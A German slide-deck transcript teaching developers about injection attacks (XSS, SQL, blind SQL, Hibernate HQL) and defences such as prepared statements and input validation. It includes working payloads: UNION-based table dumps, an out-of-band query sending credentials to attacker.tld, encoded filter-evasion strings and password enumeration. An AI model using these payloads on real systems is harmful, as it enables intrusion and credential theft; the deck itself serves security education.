SecureNet GmbH For personal use only. Distribution not allowed.

Größe: px
Ab Seite anzeigen:

Download "SecureNet GmbH 2009. For personal use only. Distribution not allowed."

Transkript

1 1

2 Die Datenbank als Erfüllungsgehilfe für Datendiebe Eine Kurzeinführung in Injection-Angriffe Stream Security Ralf Reinhardt,

3 Eine Kurzeinführung in Injection-Angriffe Inhalte HTML-Injection Cross-Site Scripting (XSS) Einschub: Data Validation und Data Sanitation SQL-Injection ( klassisch ) Blind SQL-Injection Advanced SQL-Injection ORM-Injection (Hibernate) Ausblick 3

4 Eine Kurzeinführung in Injection-Angriffe Zielpublikum und Ziel des Vortrages Einsteiger in das Thema Web Application Security Was bitte ist Cross-Site Scripting oder SQL-Injection? Warum funktioniert das eigentlich und was läuft hier schief? Entwickler, Architekten, Verantwortliche, Entscheider Erkennen der Gefahren Verstehen der zugrunde liegenden Problematik Sehen der Lösungsmöglichkeiten Wissen um die richtigen Ansatz-Stellen 4

5 Eine Kurzeinführung in Injection-Angriffe Über Ralf Reinhardt Senior Consultant und Projekt Manager seit 2004 bei der SecureNet GmbH, Frankfurter Ring 193a in München Web Application Security, Penetration Testing, Source Code Analyse Beratung, Schulung, Prozesse, Maßnahmen, Guidelines und Policies Mitglied im Open Web Application Security Project (OWASP.org) und Diplom-Informatiker (FH) Bit Homecomputer Ernsthafte Softwareentwicklung 1994 WWW mit Mosaic, Linux 1995 Pentesting auf System- und Netzwerkebene 1996 HTML 1998 JavaScript 2000 Java, MySQL 2003 J2EE, Oracle DBA 5

6 HTML-Injection 6

7 HTML-Injection Willkommen zurück! 7

8 HTML-Injection Willkommen zurück! Source Code im Browser 8

9 HTML-Injection Willkommen zurück! Source Code auf dem Server 9

10 HTML-Injection Anmeldung 10

11 HTML-Injection Anmeldung Source Code 11

12 HTML-Injection Anmeldung Max Mustermann 12

13 HTML-Injection Willkommen zurück! Max Mustermann 13

14 HTML-Injection Willkommen zurück! Max Mustermann 14

15 HTML-Injection Anmeldung Max M<u>stermann 15

16 HTML-Injection Willkommen zurück! Max M<u>stermann 16

17 HTML-Injection Willkommen zurück! Max M<u>stermann 17

18 Cross-Site Scripting (XSS) 18

19 Cross-Site Scripting (XSS) Anmeldung - <script>alert( XSS );</script> 19

20 Cross-Site Scripting (XSS) Willkommen zurück! - <script>alert( XSS );</script> 20

21 Cross-Site Scripting (XSS) Willkommen zurück! - <script>alert( XSS );</script> 21

22 Cross-Site Scripting (XSS) Arten von Cross-Site Scripting Reflektiertes XSS Existiert nur lokal im Browser des Users Angriffs-Vektor: Link oder Persistentes XSS Wird in der Datenbank / dem Repository persistiert Existiert so lange wie die manipulierten Daten in der DB existieren Angriff-Vektor: Manipulierter Gästebuch-Eintrag 22

23 Cross-Site Scripting (XSS) Mögliche Konsequenzen Spoofing Website-Spoofing Frame-Spoofing Link-Spoofing Phishing Reflektiert oder persistent Durchführbar auch mit gültigem Schloss-Symbol (SSL/TLS) Defacement, DoS, usw. Entstellung der Website Denial of Service U. v. a. m. 23

24 Cross-Site Scripting (XSS) Website Spoofing und SSL institucional.bradesco.com.br institucional.bradesco.com.br E<div style="position:absolute;top:0px;width:2000;left:0px;height:2000;backgroundcolor:white"> <iframe src= width=1000 height=800 style=margin-top:0px; margin-left:0px name=tst frameborder=0> </div> 24

25 Einschub: Data Validation und Data Sanitation 25

26 Data Validation und Data Sanitation Kommunkationswege der Daten Client (meist Browser) Application Server Datenbank 26

27 Data Validation und Data Sanitation Kommunkationswege der Daten, Output zu Input vice versa Client (meist Browser) Output / Input Input / Output Application Server Datenbank Output / Input Input / Output 27

28 Data Validation und Data Sanitation Kommunkationswege der Daten, Boundary Filtering Client (meist Browser) B o u n d a r y Output / Input Input / Output Application Server B o u n d a r y Datenbank B o u n d a r y Output / Input Input / Output Output / Input Input / Output Drittsystem 28

29 Data Validation und Data Sanitation All Input is Evil! Input (ggf. Output) Validation Validatoren überprüfen den korrekten Typ einer Variablen, also z.b.: PLZ» 5 stelliger, positiver Integer kleiner als , ggf. mit führenden Nullen adresse Telefonnummer Datum 29

30 Data Validation und Data Sanitation All Input is Evil! Input (ggf. Output) Sanitation Escaping oder Filterung von Meta-Zeichen: HTML-Escaping JavaScript-Escaping SQL-Escaping XPath, LDAP, Betriebsystem-Pfade, usw. Beispiele <, >,,,, ',.,.., :, /, \, &,(, ), [, ], {, }, %, *,?, _, ; +, -, $,!, \n, \r, \t, eof, ESC, U. v. a. m. 30

31 Data Validation und Data Sanitation All Input is Evil! Input (ggf. Output) Sanitation Filterung oder Veränderung von Schlüsselworten (Blacklisting vs. Whitelisting) HTML / JavaScript: alert, script, img, src, onload, onmouseover SQL: select, union, update, delete, insert, drop, create... U. v. a. m. 31

32 Data Validation und Data Sanitation Anmeldung Max M<u>stermann 32

33 Data Validation und Data Sanitation Willkommen zurück! Max M<u>stermann 33

34 Data Validation und Data Sanitation Willkommen zurück! Max M<u>stermann 34

35 Data Validation und Data Sanitation Anmeldung - <script>alert( XSS );</script> 35

36 Data Validation und Data Sanitation Willkommen zurück! - <script>alert( XSS );</script> 36

37 Data Validation und Data Sanitation Willkommen zurück! - <script>alert( XSS );</script> 37

38 Data Validation und Data Sanitation Exploit of a Mom, 38

39 SQL-Injection ( klassisch ) 39

40 SQL-Injection ( klassisch ) Ein Fallbeispiel (1) plz=' 40

41 SQL-Injection ( klassisch ) Ein Fallbeispiel (2) plz=münchen') UNION SELECT ort,ort,plz,ort,ort,ort FROM gaa WHERE ort LIKE 'München' 41

42 SQL-Injection ( klassisch ) Ein Fallbeispiel (3) plz=münchen') UNION SELECT Object_Name, Object_Name, Object_ID, Object_Name, Object_Name, Object_Name FROM USER_TABLES 42

43 SQL-Injection ( klassisch ) Ein Fallbeispiel (4) BANNER_LISTE BANNER_PAGE BANNER_PICS BANNER_VIEW NEWS DYN_KEY FMONATS FMONATS_DYN FMONATS_KEY FMONAT_PICS FONDS_TOP10 GAA PK_DN_ID SEQ_DN_ID SEQ_GAA_ID SQ_BANNERLISTE SQ_FMONATS SQ_PICID SYS_LOB C00003$$ SYS_LOB C00003$$ UQ_FMONAT_PICS UQ_ZINSKEY ZINSEN ZINSEN2 43

44 SQL-Injection ( klassisch ) Eine reguläre Abfrage an die Datenbank Gegeben sei die Tabelle BENUTZER mit den Spalten ANZEIGENAME FIRMA ORT LOGIN PASSWORT 44

45 SQL-Injection ( klassisch ) Konkatenierte Query im Application Server (Schlecht!) 45

46 SQL-Injection ( klassisch ) Eine reguläre Eingabemaske im Browser 46

47 SQL-Injection ( klassisch ) In Java konkatenierte Query (Schlecht!), Ergebnis 47

48 SQL-Injection ( klassisch ) Input durch den Browser 48

49 SQL-Injection ( klassisch ) Schadhafte Nutzlast 1 49

50 SQL-Injection ( klassisch ) Schadhafte Nutzlast 1, Ergebnis 50

51 SQL-Injection ( klassisch ) Schadhafte Nutzlast 2 51

52 SQL-Injection ( klassisch ) Schadhafte Nutzlast 2, Ergebnis 52

53 Blind SQL-Injection 53

54 Blind SQL-Injection Not at all Blind SQL-Injection: SQL-Injection klassisch 54

55 Blind SQL-Injection Totally Blind SQL-Injection 55

56 Blind SQL-Injection Abgrenzung Ausgangslage Das System liefert keine für den Angreifer brauchbaren Fehlermeldungen, mit denen dieser direkt auf die syntaktische Korrektheit seines Angriffsmuster schließen kann Blind SQL-Injection Leicht unterschiedliche, allgemeine Fehlermeldungen Unterschiedliches Verhalten der Anwendung, Seiteneffekte Totally Blind SQL-Injection Die Antwort des Servers ist immer identisch Es kommt gar keine Antwort 56

57 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 57

58 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 58

59 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 59

60 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 60

61 Blind SQL-Injection Erzwingen von Feedback Erzwingen von Fehlern, z.b. ORA Division by zero Auswerten von Laufzeitunterschieden SELECT COUNT(*) FROM dual; (schnell) SELECT COUNT(*) FROM all_objects; (weniger schnell) Nutzung von Seitenkanälen, Out-of-Band Signalisierung utl_http.request() httpuritype 61

62 Blind SQL-Injection Auswerten von Laufzeitunterschieden Prüfung: If Then Else SELECT COUNT(*) FROM dual; (schnell) SELECT COUNT(*) FROM all_objects; (weniger schnell) 62

63 Blind SQL-Injection Out-of-Band Signalisierung Die Oracle Datenbank verschickt einen HTTP-Request an den Angreifer Angreifer hat lesenden Zugriff auf das Webserver-Logfile von box.attacker.tld Angreifer hat lesenden Zugriff auf das DNServer-Logfile von attacker.tld 63

64 Blind SQL-Injection Out-of-Band Signalisierung Mit der Oracle Datenbank nach Hause telefonieren Ziel: Webserver-Logfile box.attacker.tld Ziel: DNServer-Logsfile attacker.tld 64

65 Blind SQL-Injection Out-of-Band Signalisierung, Eingabe der schadhaften Nutzlast 65

66 Blind SQL-Injection Out-of-Band Signalisierung, Schadhafte Nutzlast NN' UNION SELECT httpuritype(' (SELECT login FROM benutzer WHERE ID = 1) ' Password:' (SELECT passwort FROM benutzer WHERE ID = 1)).getContentType(),NULL, NULL FROM dual -- 66

67 Blind SQL-Injection Out-of-Band Signalisierung, zusammengesetzte Query 67

68 Blind SQL-Injection Out-of-Band Signalisierung, Ergebnis Im Logfiles des Web-Servers landen: Benutzername Passwort Bei einem Direktgespräch ggf. die IP-Adresse der Datenbank 68

69 Advanced SQL-Injection 69

70 Advanced SQL-Injection Abgrenzung Advanced SQL-Injection Ist nicht eindeutig zu definiert Immer dann, wenn es ein wenig anspruchsvoller wird Beispiele Shell-Injection Aufruf von Betriebssystem-Kommandos U. v. a. m Im Rahmen dieses Vortrages Umgehung des Boundary-Filterings Bedingt durch fehlerhafte Validatoren und/oder mangelnde Sanitation und/oder fehlerhaft konfigurierte Web Application Firewall (WAF) 70

71 Advanced SQL-Injection Vielgestaltigkeit von SQL-Statements SELECT 'Test!', COUNT(*) FROM dual; 71

72 Advanced SQL-Injection Übergabe einer Variablen an den Server 72

73 Advanced SQL-Injection Blick in den Source Code eines Formulars 73

74 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (URL 1) somevalue=nn%27+union+select+%27test!%2 7%2C+COUNT(*)+FROM+dual-- 74

75 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (URL 2) somevalue=nn'%20union%20select%20concat (/*%20%20egal%09*/coNCat(%09%09'T'%09,% 20%20chr%20%20(%20%20AsciI%20(%20'e'%20 )%20)%20),concAT(cHR(10%20*% )/**/,chr(116))%20)%20%20%20%20%20%20 %7C%7Cchr(LEAST(33,101,1235,8272)),COUN T(chr(42))%20FROM%20dual%

76 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (Hex) somevalue=%4e%4e%27%20%55%4e%49%4f%4e%2 0%53%45%4C%45%43%54%20%27%54%65%73%74%2 1%27%2C%20%43%4F%55%4E%54%28%2A%29%20%4 6%52%4F%4D%20%64%75%61%6C%2D%2D 76

77 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (Unicode) somevalue=%u004e%u004e%u0027%u0020%u005 5%u004E%u0049%u004F%u004E%u0020%u0053%u 0045%u004C%u0045%u0043%u0054%u0020%u002 7%u0054%u0065%u0073%u0074%u0021%u0027%u 002C%u0020%u0043%u004F%u0055%u004E%u005 4%u0028%u002A%u0029%u0020%u0046%u0052%u 004F%u004D%u0020%u0064%u0075%u0061%u006 C%u002D%u002D 77

78 ORM-Injection (Hibernate) 78

79 ORM-Injection (Hibernate) Object-Relational Mapping, über Hibernate Bekannter O/R-Mapper für Java, Abfrage-Möglichkeiten: Natives SQL Hibernate Query Language (HQL) Criteria Hibernate Query Language (HQL) Die Syntax ist an SQL angelehnt Der Funktionsumfang entspricht nur einer Teilmenge von SQL Es werden nicht Tabellen und Spalten referenziert, sondern Objekte und deren Attribute Der UNION-Operator wird nicht unterstützt 79

80 ORM-Injection (Hibernate) Ein Beispiel aus der Praxis Gegeben sei die Tabelle BENUTZER mit den Spalten LOGIN (der Login-Name, z.b. admin ) PASSWORT (das zugehörige Passwort, z.b. nim23da ) Gegeben sei die Klasse User.java mit den Attributen userloginname (der Login-Name, z.b. admin ) userpasswort (das zugehörige Passwort, z.b. nim23da ) Gegeben sei das Mapping LOGIN userloginname PASSWORT userpasswort 80

81 ORM-Injection (Hibernate) Ein Beispiel aus der Praxis Es existiert eine Funktion, die es dem Benutzer ermöglicht, seinen Login-Namen zu ändern Vor dem eigentlichen Update schaut die Anwendung nach, ob es einen Benutzer mit diesem Login-Namen bereits gibt Gibt es den gewünschten Login-Namen bereits, so wird die Aktion abgebrochen und der Benutzer erhält die Fehlermeldung Loginname existiert bereits! 81

82 ORM-Injection (Hibernate) Die Suche nach existierenden Login-Namen Feststellungen: Die Anfrage ist in HQL geschrieben und entspricht etwa einem effizienten select count(*) from... suserloginname ist der Input kommend vom Browsers des Users Das Objekt u ist eine Instanz der Klasse User Ist lcount größer als Null, so ist der Loginname bereits vergeben (und die Fehlermeldung Loginname existiert bereits! erscheint) Durch die Konkatenation existiert eine Injection-Schwachstelle 82

83 ORM-Injection (Hibernate) Enumeration von Benutzern Loginname existiert bereits! 83

84 ORM-Injection (Hibernate) Ein kurzer Test mit UNION Loginname existiert bereits! 84

85 ORM-Injection (Hibernate) Passwort-Enumeration (1) 85

86 ORM-Injection (Hibernate) Passwort-Enumeration (1), HQL-Statement SELECT COUNT(u) FROM User u WHERE u.userloginname = admin' and u.userpassword like '%' union 86

87 ORM-Injection (Hibernate) Passwort-Enumeration (1) Loginname existiert bereits! 87

88 ORM-Injection (Hibernate) Passwort-Enumeration (2) Loginname existiert bereits! 88

89 ORM-Injection (Hibernate) Passwort-Enumeration (3) Loginname existiert bereits! 89

90 ORM-Injection (Hibernate) Passwort-Enumeration (4) Loginname existiert bereits! 90

91 Generelle Injection-Problematik Quintessenz Keine zusammengesetzte Queries! Keine Dynamik! Umgehung des SQL-Interpreters, z.b. durch ausschließliche Verwendung gebundener Parameter in Prepared Statements (keine Stored Procedures!) Korrekt verwendete O/R-Mapper Wirksames Boundary Filtering! All Input is Evil! Input / Output Validation Input / Output Sanitation Dies betrifft nicht nur SQL! LDAP-Injection XPath-Injection U. v. a. m. 91

92 Ausblick 92

93 Ausblick Rückblick Boundary Filtering Client (meist Browser) B o u n d a r y Output / Input Input / Output Application Server B o u n d a r y Datenbank B o u n d a r y Output / Input Input / Output Output / Input Input / Output Drittsystem 93

94 Ausblick Maßnahmen bei Systemen in Wartung Vulnerability-Assessment ( Max M<u>stermann ) Web Application Security Penetration Test Code Review (und Fixing!) Source Code Analyse (und Fixing!) Awareness-Maßnahmen, Schulungen, Workshops Secure Coding Guidelines / Policies Secure Software Development Lifecycle / Prozesse 94

95 Ausblick Maßnamen bei Legacy-Systemen: Web Application Firewalls Client (meist Browser) B o u n d a r y Output / Input Input / Output WAF Application Server B o u n d a r y Datenbank B o u n d a r y Output / Input Input / Output Output / Input Input / Output Drittsystem WAF WAF 95

96 Vielen Dank! Fragen? Anregungen? SecureNet GmbH Frankfurter Ring 193a D München +49 (0)89 / Ralf Reinhardt ralf.reinhardt@securenet.de Web Application Security Penetration Testing, Source Code Analyse, Maßnahmen-Beratung Softwareentwicklung Entwicklung sicherer Webanwendungen 96

97 97

SecureNet GmbH For personal use only. Distribution not allowed.

SecureNet GmbH For personal use only. Distribution not allowed. 1 Die Datenbank als Erfüllungsgehilfe für Datendiebe Eine Kurzeinführung in Injection-Angriffe DOAG Regionaltreffen Südbayern FH München, Raum R 1.046 Ralf Reinhardt, 21.04.2010, 17:30 http://www.securenet.de

Mehr

Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen

Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen Ralf Reinhardt 28.11.2013, 16:40 Uhr Roadshow Sicheres Internet aiti-park Werner-von-Siemens-Str. 6 86159 Augsburg 1 Hacker-Tool Browser Über

Mehr

Sicherheit in Webanwendungen CrossSite, Session und SQL

Sicherheit in Webanwendungen CrossSite, Session und SQL Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery

Mehr

SQL-Injection. Seite 1 / 16

SQL-Injection. Seite 1 / 16 SQL-Injection Seite 1 / 16 Allgemein: SQL (Structured Query Language) Datenbanksprache zur Definition von Datenstrukturen in Datenbanken Bearbeiten und Abfragen von Datensätzen Definition: SQL-Injection

Mehr

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 The OWASP Foundation http://www.owasp.org Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 Tobias Glemser tobias.glemser@owasp.org tglemser@tele-consulting.com Ralf Reinhardt

Mehr

Informationstechnik & System-Management SQL INJECTION. Selbstgemachte Sicherheitslücken. SQL-Injection ITSB2006 Michael Donabaum

Informationstechnik & System-Management SQL INJECTION. Selbstgemachte Sicherheitslücken. SQL-Injection ITSB2006 Michael Donabaum SQL INJECTION Selbstgemachte Sicherheitslücken Beschreibung SQL-Injection SQL-Einschleusung Ausnutzen von Sicherheitslücken in Zusammenspiel mit SQL-Datenbanken Mangelnde Maskierung von Metazeichen \ ;

Mehr

OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes

OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes 1 XSS: Cross-Site Scripting 1.) Es gelangen Daten in den Web-Browser, die Steuerungsinformationen

Mehr

php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...

php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe... php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...7 3.Zugriff auf mysql Daten...11 Verteilte Systeme: php.sxw Prof.

Mehr

Wo finde ich die Software? - Jedem ProLiant Server liegt eine Management CD bei. - Über die Internetseite http://www.hp.

Wo finde ich die Software? - Jedem ProLiant Server liegt eine Management CD bei. - Über die Internetseite http://www.hp. Erfahrungen mit dem Insight Manager von HP Dipl. Ing. Elektrotechnik (FH) - Automatisierungs- / Regelungstechnik DV-Spezialist Landesbank Rheinland-Pfalz Abteilung 2-351 Große Bleiche 54-56 55098 Mainz

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In)Security - Themen Alte Freunde SQL Injections, Code Executions & Co. Cross Site Scripting Cross Site Scripting in der Praxis JavaScript

Mehr

How to install freesshd

How to install freesshd Enthaltene Funktionen - Installation - Benutzer anlegen - Verbindung testen How to install freesshd 1. Installation von freesshd - Falls noch nicht vorhanden, können Sie das Freeware Programm unter folgendem

Mehr

Prozedurale Datenbank- Anwendungsprogrammierung

Prozedurale Datenbank- Anwendungsprogrammierung Idee: Erweiterung von SQL um Komponenten von prozeduralen Sprachen (Sequenz, bedingte Ausführung, Schleife) Bezeichnung: Prozedurale SQL-Erweiterung. In Oracle: PL/SQL, in Microsoft SQL Server: T-SQL.

Mehr

Dieses Dokument soll dem Administrator helfen, die ENiQ-Software als Client auf dem Zielrechner zu installieren und zu konfigurieren.

Dieses Dokument soll dem Administrator helfen, die ENiQ-Software als Client auf dem Zielrechner zu installieren und zu konfigurieren. CLIENT INSTALLATION DES ENIQ ACCESSMANAGEMENTS Dieses Dokument soll dem Administrator helfen, die ENiQ-Software als Client auf dem Zielrechner zu installieren und zu konfigurieren. Ein Client kann in drei

Mehr

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011 Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich

Mehr

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus?

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Einführung in Web-Security

Einführung in Web-Security Einführung in Web-Security Alexander»alech«Klink Gulaschprogrammiernacht 2013 Agenda Cross-Site-Scripting (XSS) Authentifizierung und Sessions Cross-Site-Request-Forgery ([XC]SRF) SQL-Injections Autorisierungsprobleme

Mehr

Dynamisches SQL. Folien zum Datenbankpraktikum Wintersemester 2009/10 LMU München

Dynamisches SQL. Folien zum Datenbankpraktikum Wintersemester 2009/10 LMU München Kapitel 4 Dynamisches SQL Folien zum Datenbankpraktikum Wintersemester 2009/10 LMU München 2008 Thomas Bernecker, Tobias Emrich unter Verwendung der Folien des Datenbankpraktikums aus dem Wintersemester

Mehr

Sicher sein, statt in Sicherheit wiegen Sicherheit bei. Web-Anwendungen. Vortrag bei Infotech 08.06.2015

Sicher sein, statt in Sicherheit wiegen Sicherheit bei. Web-Anwendungen. Vortrag bei Infotech 08.06.2015 Sicher sein, statt in Sicherheit wiegen Sicherheit bei Web-Anwendungen Vortrag bei Infotech 08.06.2015 2 Ist Sicherheit bei Web-Anwendungen ein Thema? 3 Zusammenfassung Verizon Data-Breach-Report 2014,

Mehr

Benutzer Anleitung Manegger Tourenbuch

Benutzer Anleitung Manegger Tourenbuch Benutzer Anleitung Manegger Tourenbuch Stand: 7.10.2013 Autor: Berthold Müller 1. Login Vorgang... 2 2. Passwort ändern und Benutzerdaten überprüfen und anpassen... 2 2.1. Maske mit Benutzerdaten... 3

Mehr

Albert HAYR Linux, IT and Open Source Expert and Solution Architect. Open Source professionell einsetzen

Albert HAYR Linux, IT and Open Source Expert and Solution Architect. Open Source professionell einsetzen Open Source professionell einsetzen 1 Mein Background Ich bin überzeugt von Open Source. Ich verwende fast nur Open Source privat und beruflich. Ich arbeite seit mehr als 10 Jahren mit Linux und Open Source.

Mehr

Grundlagen der Informatik 2

Grundlagen der Informatik 2 Grundlagen der Informatik 2 Dipl.-Inf., Dipl.-Ing. (FH) Michael Wilhelm Hochschule Harz FB Automatisierung und Informatik mwilhelm@hs-harz.de Raum 2.202 Tel. 03943 / 659 338 1 Gliederung 1. Einführung

Mehr

PHP - Projekt Personalverwaltung. Erstellt von James Schüpbach

PHP - Projekt Personalverwaltung. Erstellt von James Schüpbach - Projekt Personalverwaltung Erstellt von Inhaltsverzeichnis 1Planung...3 1.1Datenbankstruktur...3 1.2Klassenkonzept...4 2Realisierung...5 2.1Verwendete Techniken...5 2.2Vorgehensweise...5 2.3Probleme...6

Mehr

Wie funktioniert das WWW? Sicher im WWW

Wie funktioniert das WWW? Sicher im WWW Wie funktioniert das WWW? Sicher im WWW Der normale Aufruf 1. Browserprogramm starten 2. Adresse eintippen, z.b. : ich-hab-doch-nichts-zu-verbergen.de 3. Der Browser ändert die Adresse auf: http://ich-hab-doch-nichts-zu-verbergen.de/

Mehr

SSO-Schnittstelle. Inhalt: Beschreibung der Single Sign-On (SSO) Schnittstelle. NetSlave GmbH Simon-Dach-Straße 12 D-10245 Berlin

SSO-Schnittstelle. Inhalt: Beschreibung der Single Sign-On (SSO) Schnittstelle. NetSlave GmbH Simon-Dach-Straße 12 D-10245 Berlin SSO-Schnittstelle Inhalt: Beschreibung der Single Sign-On (SSO) Schnittstelle NetSlave GmbH Simon-Dach-Straße 12 D-10245 Berlin Telefon +49 (0)30-94408-730 Telefax +49 (0)30-96083-706 E-Mail mail@netslave.de

Mehr

Externe Authentifizierung. Externe Authentifizierung IACBOX.COM. Version 2.0.1 Deutsch 23.05.2014

Externe Authentifizierung. Externe Authentifizierung IACBOX.COM. Version 2.0.1 Deutsch 23.05.2014 Version 2.0.1 Deutsch 23.05.2014 In diesem HOWTO wird beschrieben wie Sie verschiedene Backend's wie SQL Server, Radius Server, Active Directory etc. zur Authentifizierung der Benutzer an die IAC-BOX anbinden.

Mehr

Datenbanken für Online Untersuchungen

Datenbanken für Online Untersuchungen Datenbanken für Online Untersuchungen Im vorliegenden Text wird die Verwendung einer MySQL Datenbank für Online Untersuchungen beschrieben. Es wird davon ausgegangen, dass die Untersuchung aus mehreren

Mehr

DB2 Kurzeinführung (Windows)

DB2 Kurzeinführung (Windows) DB2 Kurzeinführung (Windows) Michaelsen c 25. Mai 2010 1 1 Komponenten von DB2 DB2 bietet zahlreiche graphische Oberflächen für die Verwaltung der verschiedenen Komponenten und Anwendungen. Die wichtigsten

Mehr

mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank

mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank In den ersten beiden Abschnitten (rbanken1.pdf und rbanken2.pdf) haben wir uns mit am Ende mysql beschäftigt und kennengelernt, wie man

Mehr

Ein Ausflug zu ACCESS

Ein Ausflug zu ACCESS Ein Ausflug zu ACCESS Die folgenden Folien zeigen beispielhaft, wie man sein DB- Wissen auf ACCESS übertragen kann betrachtet wird ACCESS 2002, da gerade im Bereich der Nutzung von SQL hier einiges nachgearbeitet

Mehr

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink Hacker-Methoden in der IT- Sicherheitsausbildung Dr. Martin Mink Hacker-Angriffe 3.11.2010 Hacker-Methoden in der IT-Sicherheitsausbildung Dr. Martin Mink 2 Typische Angriffe auf Web- Anwendungen SQL Injection

Mehr

Web Application Security

Web Application Security Web Application Security Was kann schon schiefgehen. Cloud & Speicher Kommunikation CMS Wissen Shops Soziale Netze Medien Webseiten Verwaltung Chancen E-Commerce Kommunikation Globalisierung & Digitalisierung

Mehr

ACCOUNTINFO 1.01 VERWENDEN DER ACCOUNTINFO-SCHNITTSTELLE ABFARGE VON ACCOUNT-INFORMATIONEN IN ECHTZEIT 02. MÄRZ 2010

ACCOUNTINFO 1.01 VERWENDEN DER ACCOUNTINFO-SCHNITTSTELLE ABFARGE VON ACCOUNT-INFORMATIONEN IN ECHTZEIT 02. MÄRZ 2010 VERWENDEN DER ACCOUNTINFO-SCHNITTSTELLE ABFARGE VON ACCOUNT-INFORMATIONEN IN ECHTZEIT 02. MÄRZ 2010 VERTRIEBLICHE FRAGEN ZUM FITSMS-GATEWAY mpc networks GmbH Abteilung FitSMS Vertrieb tel +49 (0) 7154-17

Mehr

Datenbank-Verschlüsselung mit DbDefence und Webanwendungen.

Datenbank-Verschlüsselung mit DbDefence und Webanwendungen. Datenbank-Verschlüsselung mit DbDefence und Webanwendungen. In diesem Artikel werden wir Ihnen zeigen, wie Sie eine Datenbank verschlüsseln können, um den Zugriff einzuschränken, aber trotzdem noch eine

Mehr

2. Einrichtung der ODBC-Schnittstelle aus orgamax (für 32-bit-Anwendungen)

2. Einrichtung der ODBC-Schnittstelle aus orgamax (für 32-bit-Anwendungen) 1. Einführung: Über den ODBC-Zugriff können Sie bestimmte Daten aus Ihren orgamax-mandanten in anderen Anwendungen (beispielsweise Microsoft Excel oder Microsoft Access) einlesen. Dies bietet sich beispielsweise

Mehr

Konfiguration Firewall (Zyxel Zywall 10) (von Gruppe Schraubenmeier)

Konfiguration Firewall (Zyxel Zywall 10) (von Gruppe Schraubenmeier) Konfiguration Firewall (Zyxel Zywall 10) (von Gruppe Schraubenmeier) Firewall über Seriellen Anschluss mit Computer verbinden und Netzteil anschliessen. Programm Hyper Terminal (Windows unter Start Programme

Mehr

Authentication Policy. Konfigurationsbeispiel ZyXEL ZyWALL USG-Serie. Juni 2010 / HAL

Authentication Policy. Konfigurationsbeispiel ZyXEL ZyWALL USG-Serie. Juni 2010 / HAL Authentication Policy Konfigurationsbeispiel ZyXEL ZyWALL USG-Serie Juni 2010 / HAL LOKALE USER DATENBANK Über Authentication Policy verknüpft man ZyWALL-Dienste und Benutzer so, dass die Nutzung der Dienste

Mehr

OP-LOG www.op-log.de

OP-LOG www.op-log.de Verwendung von Microsoft SQL Server, Seite 1/18 OP-LOG www.op-log.de Anleitung: Verwendung von Microsoft SQL Server 2005 Stand Mai 2010 1 Ich-lese-keine-Anleitungen 'Verwendung von Microsoft SQL Server

Mehr

mysoftfolio360 Handbuch

mysoftfolio360 Handbuch mysoftfolio360 Handbuch Installation Schritt 1: Application Server und mysoftfolio installieren Zuallererst wird der Application Server mit dem Setup_ApplicationServer.exe installiert und bestätigen Sie

Mehr

DIE DATENBANK ALS ERFÜLLUNGSGEHILFE FÜR DATENDIEBE

